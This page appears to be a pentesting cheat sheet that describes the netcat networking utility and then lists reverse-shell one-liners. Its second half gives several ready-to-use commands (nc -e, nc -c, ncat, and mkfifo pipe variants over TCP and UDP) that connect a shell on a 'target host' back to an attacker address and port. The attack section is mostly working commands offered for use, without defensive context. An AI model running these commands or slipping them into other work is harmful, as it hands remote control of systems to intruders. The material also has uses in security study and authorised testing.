Last Updated:
netcat, the TCP/IP "Swiss Army Knife"
netcat, the TCP/IP "Swiss Army Knife"

Reverse Shells: netcat style

About netcat:

Netcat is a fully featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Netcat is commonly referred to as the "TCP/IP Swiss Army Knife", by those who know how to use it. It comes pre-installed on a lot of operating systems. Here are some links to various versions of netcat. Refer to their respective websites to find any differences that exist:

Reverse Shells: netcat style

The -e flag is sometimes disabled at compile-time and sometimes it is not included with a re-implementation of netcat. But, if the version on your target host does support it, the -e flag allows you to bind netcat to any executable. This makes spawning a reverse shell trivial:

nc -e sh 123.456.789.012 31313
nc.exe -e cmd.exe 123.456.789.012 31313
ncat 123.456.789.012 31313 -e sh

Some times -e is simply replaced by the similar -c (check your help file or man page):

nc -c sh 123.456.789.012 31313

netcat without being able to bind a command to a port

Other times, neither -e or -c are provided. You can still use netcat to spawn a reverse shell by creating a socket. To do this, you create a pipe and bind that to netcat and the concatenate command, like so:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 123.456.789.012 31313 >/tmp/f

Netcat as a reverse shell over UDP, as well as creating a socket:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|ncat -u 123.456.789.012 31313 >/tmp/f